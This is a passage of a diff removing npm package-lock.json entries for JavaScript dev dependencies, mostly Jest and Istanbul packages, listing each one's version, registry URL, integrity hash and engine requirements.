"sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": 